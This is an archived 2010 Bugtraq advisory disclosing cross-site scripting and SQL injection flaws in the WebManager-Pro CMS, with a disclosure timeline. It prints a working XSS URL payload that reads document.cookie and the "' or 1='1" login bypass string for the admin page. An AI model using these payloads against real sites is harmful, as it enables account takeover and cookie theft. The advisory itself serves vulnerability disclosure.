|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: MustLive (mustlive
websecurity.com.ua)
Date: Sat Oct 30 2010 - 12:42:18 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello Bugtraq!
I want to warn you about Cross-Site Scripting and SQL Injection
vulnerabilities in CMS WebManager-Pro. It's Ukrainian commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are CMS WebManager-Pro v.7.4.3 (version from FGS_Studio) and
previous versions.
----------
Details:
----------
XSS (WASC-08):
http://site/index.php?word[]=%22%20onMouseOver=alert(document.cookie)%20
This vulnerability can be used together with MouseOverJacking
(http://websecurity.com.ua/3814/).
SQL Injection (Authentication Bypass) (WASC-19):
At the page http://site/admin/ at turned off mq:
' or 1='1
In field Login.
------------
Timeline:
------------
2010.07.28 - announced at my site.
2010.07.29 - informed developers.
2010.10.30 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4414/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]